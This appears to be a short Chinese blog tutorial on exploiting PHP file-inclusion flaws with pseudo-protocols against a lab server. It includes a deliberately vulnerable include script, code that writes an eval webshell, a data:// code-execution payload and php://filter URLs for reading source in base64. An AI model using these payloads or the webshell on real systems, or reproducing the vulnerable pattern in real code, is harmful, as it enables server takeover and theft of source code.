配合php的伪协议利用文件包含漏洞

一、php://input

将php代码写到post里进行提交
所用到的源码

<?php
      $file = $_REQUEST['p'];      // 读取p参数传来的值
      include($file);                  // 包含
?>

配合php的伪协议利用文件包含漏洞

配合写入一句话

<?php
$f = fopen('./webshell.php','w');      // 打开文件
$str = "$_POST['x']";
fwrite($f,"<?php eval($str); ?>");      // 写入文件
fclose($f)      // 关闭文件
?>

配合php的伪协议利用文件包含漏洞

二、data

http://192.168.0.100:88/include.php?p=data: text/plain,<?php phpinfo();?>
配合php的伪协议利用文件包含漏洞

三、php://filter

resource 指定某一个文件
http://192.168.0.100:88/include.php?p=php://filter/resource=phpinfo.php
配合php的伪协议利用文件包含漏洞
我们要想读取PHP源文件可以进行base64编码
我是看这篇文章的

https://blog.csdn.net/qq_29419013/article/details/81201494

http://192.168.0.100:88/include.php?p=php://filter/read=convert.base64-encode/resource=phpinfo.php
配合php的伪协议利用文件包含漏洞

上一篇:Leetcode--合并两个有序数组(88)


下一篇:Leetcode -88. 合并两个有序数组